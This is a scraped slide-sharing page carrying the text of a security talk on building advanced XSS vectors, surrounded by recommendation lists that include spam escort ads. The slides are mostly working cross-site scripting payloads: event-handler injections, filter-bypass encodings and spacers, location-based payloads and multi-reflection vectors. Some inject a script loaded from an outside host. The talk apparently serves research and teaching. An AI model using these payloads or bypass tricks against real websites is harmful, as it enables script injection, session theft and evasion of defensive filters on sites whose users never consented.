D2 t2 steven seeley - ghost in the windows 7 allocator_mr_me
 

Viewers also liked (20)

The Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile PlatformsThe Hidden XSS - Attacking the Desktop & Mobile Platforms
The Hidden XSS - Attacking the Desktop & Mobile Platforms
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
 
New Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit CreationNew Methods in Automated XSS Detection & Dynamic Exploit Creation
New Methods in Automated XSS Detection & Dynamic Exploit Creation
 
libinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreathlibinjection: from SQLi to XSS  by Nick Galbreath
libinjection: from SQLi to XSS  by Nick Galbreath
 
How To Detect Xss
How To Detect XssHow To Detect Xss
How To Detect Xss
 
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
 
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
JavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrimeJavaScript Static Security Analysis made easy with JSPrime
JavaScript Static Security Analysis made easy with JSPrime
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Pengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDKPengenalan HTML5, Mobile Application, dan Intel XDK
Pengenalan HTML5, Mobile Application, dan Intel XDK
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
 
Owasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF SessionOwasp AppSecEU 2015 - BeEF Session
Owasp AppSecEU 2015 - BeEF Session
 
{{more}} Kibana4
{{more}} Kibana4{{more}} Kibana4
{{more}} Kibana4
 
How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012How to-catch-a-chameleon-steven seeley-ruxcon-2012
How to-catch-a-chameleon-steven seeley-ruxcon-2012
 
Final lfh presentation (3)
Final lfh presentation (3)Final lfh presentation (3)
Final lfh presentation (3)
 
Apache安装配置mod security
Apache安装配置mod securityApache安装配置mod security
Apache安装配置mod security
 
D2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocatorD2 t2 steven seeley - ghost in the windows 7 allocator
D2 t2 steven seeley - ghost in the windows 7 allocator
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 

Similar to Building Advanced XSS Vectors

the next web now
the next web nowthe next web now
the next web nowzulin Gu
 
Modern frontend development with VueJs
Modern frontend development with VueJsModern frontend development with VueJs
Modern frontend development with VueJsTudor Barbu
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsOWASP Kyiv
 
Hands-On XML Attacks
Hands-On XML AttacksHands-On XML Attacks
Hands-On XML AttacksToe Khaing
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup PerformanceJustin Cataldo
 
Private slideshow
Private slideshowPrivate slideshow
Private slideshowsblackman
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Positive Hack Days
 
Building High Performance Web Applications and Sites
Building High Performance Web Applications and SitesBuilding High Performance Web Applications and Sites
Building High Performance Web Applications and Sitesgoodfriday
 
BITM3730 10-3.pptx
BITM3730 10-3.pptxBITM3730 10-3.pptx
BITM3730 10-3.pptxMattMarino13
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeAndrea Cardinale
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack
 

Similar to Building Advanced XSS Vectors (20)

Performance patterns
Performance patternsPerformance patterns
Performance patterns
 
UNIT 1 (7).pptx
UNIT 1 (7).pptxUNIT 1 (7).pptx
UNIT 1 (7).pptx
 
the next web now
the next web nowthe next web now
the next web now
 
Modern frontend development with VueJs
Modern frontend development with VueJsModern frontend development with VueJs
Modern frontend development with VueJs
 
Andriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tipsAndriy Shalaenko - GO security tips
Andriy Shalaenko - GO security tips
 
Hands-On XML Attacks
Hands-On XML AttacksHands-On XML Attacks
Hands-On XML Attacks
 
前端概述
前端概述前端概述
前端概述
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
Private slideshow
Private slideshowPrivate slideshow
Private slideshow
 
Attacks against Microsoft network web clients
Attacks against Microsoft network web clients Attacks against Microsoft network web clients
Attacks against Microsoft network web clients
 
Intro to JavaScript
Intro to JavaScriptIntro to JavaScript
Intro to JavaScript
 
Jquery Basics
Jquery BasicsJquery Basics
Jquery Basics
 
Jquery fundamentals
Jquery fundamentalsJquery fundamentals
Jquery fundamentals
 
Java script
Java scriptJava script
Java script
 
Building High Performance Web Applications and Sites
Building High Performance Web Applications and SitesBuilding High Performance Web Applications and Sites
Building High Performance Web Applications and Sites
 
BITM3730 10-3.pptx
BITM3730 10-3.pptxBITM3730 10-3.pptx
BITM3730 10-3.pptx
 
Logstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtimeLogstash for SEO: come monitorare i Log del Web Server in realtime
Logstash for SEO: come monitorare i Log del Web Server in realtime
 
Dart Workshop
Dart WorkshopDart Workshop
Dart Workshop
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
 
Lumberjack XPath 101
Lumberjack XPath 101Lumberjack XPath 101
Lumberjack XPath 101
 

Recently uploaded

Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxnull - The Open Security Community
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?XfilesPro
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 

Recently uploaded (20)

Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptxMaking_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
Making_way_through_DLL_hollowing_inspite_of_CFG_by_Debjeet Banerjee.pptx
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 

Building Advanced XSS Vectors

  • 3. About - Agenda ● About ● Vector Scheme ● Vector Builder (webGun) ● Agnostic Event Handlers ● Reusing Native Code ● Filter Bypass ● Location Based Payloads ● Multi Reflection
  • 4. About - Speaker ● Security researcher @sucurisecurity ● Former #1 @openbugbounty ● Some HoF & acknowledgements ● XSS expert
  • 5. About - Presentation ● Not just another talk on XSS ● Use of alert(1) for didactic purposes ● Mainly about event based XSS ● Some stuff may be hard to follow
  • 7. Vector Scheme ● Regular <tag handler=code> Example: <svg onload=alert(1)>
  • 8. Vector Scheme ● Full extra1 <tag spacer1 extra2 spacer2 handler spacer3 = spacer4 code spacer5> extra3 Example: <table><thead%0Cstyle=font-size:700px%0Donmouseover%0A=%0Bprompt (1)%09><td>AAAAAAAAA
  • 10. Vector Builder (webGun) ● Interactive cheat sheet ● Builder of XSS vectors/payloads ● More than 3k unique combinations ● Event or tag oriented ● Handlers by browser ● Handlers by length* ● Manual vector editing ● Test on target or default test page * for filter bypass procedure.
  • 11.
  • 12.
  • 14. Agnostic Event Handlers ● Used with almost any tag ● Ones that work with arbitrary tags Example: <brute ● Most require UI ● Work on all major browsers
  • 15. Agnostic Event Handlers - List ● onblur ● onclick ● oncopy ● oncontextmenu ● oncut ● ondblclick ● ondrag ● onfocus ● oninput ● onkeydown ● onkeypress ● onkeyup ● onmousedown ● onmousemove ● onmouseout ● onmouseover ● onmouseup ● onpaste
  • 16. Agnostic Event Handlers ● Example: <brute onclick=alert(1)>clickme!
  • 18. Reusing Native Code ● Example 1 ...<input type="hidden" value="INPUT"></form><script type="text/javascript"> function x(){ do something }</script> ● INPUT "><script>alert(1)// or "><script>alert(1)<!--
  • 19. Reusing Native Code ● Injection ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script> ● Result ...<input type="hidden" value=""><script>alert(1)//"></form><script type=" text/javascript"> function x(){ do something }</script>
  • 20. Reusing Native Code ● Example 2 … <input type="hidden" value="INPUT" > </form> <script type="text/javascript"> function x() { do something } </script> ● INPUT "><script src="//brutelogic.com.br/1 or "><script src="//3334957647/1
  • 21. Reusing Native Code ● Injection … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script> ● Result … <input type="hidden" value="" ><script src="//brutelogic.com.br/1" > </form> <script type="text/javascript"> function x() { do something } </script>
  • 23. Filter Bypass - Procedure ● Arbitrary tag + fake handler ● Start with 5 chars, increase ● Example <x onxxx=1 (5) pass <x onxxxx=1 (6) pass <x onxxxxx=1 (7) block Up to 6 chars: oncut, onblur, oncopy, ondrag, ondrop, onhelp, onload, onplay, onshow
  • 24. Filter Bypass - Tricks ● Encoding %3Cx onxxx=1 <%78 onxxx=1 <x %6Fnxxx=1 <x o%6Exxx=1 <x on%78xx=1 <x onxxx%3D1 ● Mixed Case <X onxxx=1 <x ONxxx=1 <x OnXxx=1 <X OnXxx=1 ● Doubling <x onxxx=1 onxxx=1
  • 25. Filter Bypass - Tricks ● Spacers <x/onxxx=1 <x%09onxxx=1 <x%0Aonxxx=1 <x%0Conxxx=1 <x%0Donxxx=1 <x%2Fonxxx=1 ● Combo <x%2F1=">%22OnXxx%3D1 ● Quotes <x 1='1'onxxx=1 <x 1="1"onxxx=1 ● Mimetism <x </onxxx=1 (closing tag) <x 1=">" onxxx=1 (text outside tag) <http://onxxx%3D1/ (URL)
  • 27. Location Based Payloads ● Really complex payloads can be built ● document.location properties and similar ● Avoiding special chars (at least between = and >) ● Game over to filter
  • 28. Location Based Payloads - Document Properties ● location.protocol protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 29. Location Based Payloads - Document Properties ● location.hostname, document.domain protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 30. Location Based Payloads - Document Properties ● location.origin protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 31. Location Based Payloads - Document Properties ● location.pathname protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 32. Location Based Payloads - Document Properties ● location.search protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 33. Location Based Payloads - Document Properties ● previousSibling.nodeValue, document.body.textContent* ("Before") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 34. Location Based Payloads - Document Properties ● tagName, nodeName ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 35. Location Based Payloads - Document Properties ● outerHTML ("Itself") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 36. Location Based Payloads - Document Properties ● innerHTML* ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 37. Location Based Payloads - Document Properties ● textContent, nextSibling.nodeValue*, firstChild.nodeValue, lastChild. nodeValue ("After") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3 * (may need to close the injected tag)
  • 38. Location Based Payloads - Document Properties ● Location.hash ("Hash") protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 39. Location Based Payloads - Document Properties ● URL, location.href, baseURI, documentURI protocol: // domain / path/page ?p= text1 <tag handler=code> text2 # text3
  • 40. Location Based Payloads - Evolution 1 <svg onload=location='javascript:alert(1)'> <svg onload=location=location.hash.substr(1)>#javascript:alert(1) <svg onload=location='javas'+'cript:'+'ale'+'rt'+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+cript:/.source+/ale/.source+/rt/. source+location.hash.substr(1)>#(1) <svg onload=location=/javas/.source+/cript:/.source+/ale/.source+/rt/. source+location.hash[1]+1+location.hash[2]>#()
  • 41. Location Based Payloads - Evolution 2 <javascript onclick=alert(tagName)>click me! <javascript:alert(1) onclick=location=tagName>click me! <== doesn't work! So... <javascript onclick=location=tagName+location.hash(1)>click me!#:alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) javascript + :"click me! + #"-alert(1) javascrip + t:"click me! + #"-alert(1) javas + cript:"click me! + #"-alert(1)
  • 42. Location Based Payloads - Taxonomy ● By Type 1. Location 2. Location Self 3. Location Self Plus ● By Positioning (Properties) Before < Itself > After # Hash Inside
  • 43. Location Based Payloads - Location ● Location After (innerHTML) <j onclick=location=innerHTML>javascript&colon;alert(1)// ● Location Inside (name+id) <svg id=t:alert(1) name=javascrip onload=location=name+id>
  • 44. Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+location.hash) <javascript onclick=location=tagName+innerHTML+location.hash>:/*click me! #*/alert(1) <javascript onclick=location=tagName+innerHTML+location.hash>:'click me!#'- alert(1) <javascript onclick=location=tagName+innerHTML+URL>:"-'click me! </javascript>#'-alert(1) Result: javascript + :"-'click me! + http://..."-'click me</javascript>#'-alert(1)
  • 45. Location Based Payloads - Location ● Location Itself + Hash (tagName+URL) <javascript:"-' onclick=location=tagName+URL>click me!#'-alert(1) (“Labeled Jump”) <javascript: onclick=location=tagName+URL>click me!#%0Aalert(1) Result: javascript: + http://...<javascript: onclick=location=tagName+URL>click me!#% 0Aalert(1)
  • 46. Location Based Payloads - Location ● Location After + Hash (innerHTML+URL) <j onclick=location=innerHTML+URL>javascript:"-'click me!</j>#'-alert(1) <j onclick=location=innerHTML+URL>javascript:</j>#%0Aalert(1)
  • 47. Location Based Payloads - Location ● Location Itself + After + Hash (tagName+innerHTML+URL) <javas onclick=location=tagName+innerHTML+URL>cript:"-'click me!</javas>#'- alert(1) <javas onclick=location=tagName+innerHTML+URL>cript:</javas>#%0Aalert(1)
  • 48. Location Based Payloads - Location ● Location Itself + Before (tagName+previousSibling) "-alert(9)<javascript:" onclick=location=tagName+previousSibling. nodeValue>click me! ● Location Itself + After + Before (tagName+innerHTML+previousSibling) '-alert(9)<javas onclick=location=tagName+innerHTML+previousSibling. nodeValue>cript:'click me!
  • 49. Location Based Payloads - Location ● Location After + Itself (innerHTML+outerHTML) <alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript:1/*click me! */</alert(1)<!-- --> javascript:1/*click me!*/ + <alert(1)<!-- … </alert(1)<!-- --> <j 1="*/""-alert(1)<!-- onclick=location=innerHTML+outerHTML>javascript: /*click me! javascript:/*click me! + <j 1="*/""-alert(1)<!-- …
  • 50. Location Based Payloads - Location ● Location After + Before + Itself (innerHTML+previousSibling+outerHTML) */"<j"-alert(9)<!-- onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j"-alert(9)<!-- ... */"<j 1=-alert(9)// onclick=location=innerHTML+previousSibling. nodeValue+outerHTML>javascript:/*click me! javascript:/*click me! + */" + <j 1="-alert(9)//" ...
  • 51. Location Based Payloads - Location Self ● Location Self Inside p=<svg id=?p=<svg/onload=alert(1)%2B onload=location=id> http://...?p=<svg/onload=alert(1)+ p=<svg id=?p=<script/src=//brutelogic.com.br/1%2B onload=location=id> http://...?p=<script/src=//brutelogic.com.br/1+
  • 52. Location Based Payloads - Location Self ● Location Self After p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)> http://...?p=<svg/onload=alert(1)>
  • 53. Location Based Payloads - Location Self Plus ● Location Self Plus Itself p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me! http://...?p=%3Cj%26p=%3Csvg%2Bonload=alert(1)%20onclick=location% 2B=outerHTML%3Eclick%20me!<j&p=<svg+onload=alert(1) onclick=" location+=outerHTML">
  • 54. Location Based Payloads - Location Self Plus ● Location Self Plus After p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)> http://...?p=%3Cj%20onclick=location%2B=textContent%3E%26p=%26lt; svg/onload=alert(1)%3E&p=<svg/onload=alert(1)>
  • 55. Location Based Payloads - Location Self Plus ● Location Self Plus Before p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body. textContent>click me! http://...?p=%26p=%26lt;svg/onload=alert(1)%3E%3Cj%20onclick=location% 2B=document.body.textContent%3Eclick%20me![BODY_CONTENT] &p=<svg/onload=alert(1)>click me!
  • 57. Multi Reflection - Single Input ● Double Reflection - Single Input p='onload=alert(1)><svg/1=' 'onload=alert(1)><svg/1=' … [code] … 'onload=alert(1)><svg/1=' ● Double Reflection - Single Input (script) p=’>alert(1)</script><script/1=’ p=*/alert(1)</script><script>/* */alert(1)</script><script>/* … [code] … */alert(1)</script><script>/*
  • 58. Multi Reflection - Single Input ● Triple Reflection - Single Input p=*/alert(1)">'onload="/*<svg/1=' p=`-alert(1)">'onload="`<svg/1=' `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' … [code] … `-alert(1)">'onload="`<svg/1=' ● Triple Reflection - Single Input (script) p=*/</script>'>alert(1)/*<script/1=' */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1=' … [code] … */</script>'>alert(1)/*<script/1='
  • 59. Multi Reflection - Multi Input ● 2 inputs: p=<svg/1='&q='onload=alert(1)> ● 3 inputs: p=<svg 1='&q=onload='/*&r=*/alert(1)'>
  • 60. Conclusion ● XSS vectors can: - be complex; - easily evade filters; - blow your mind.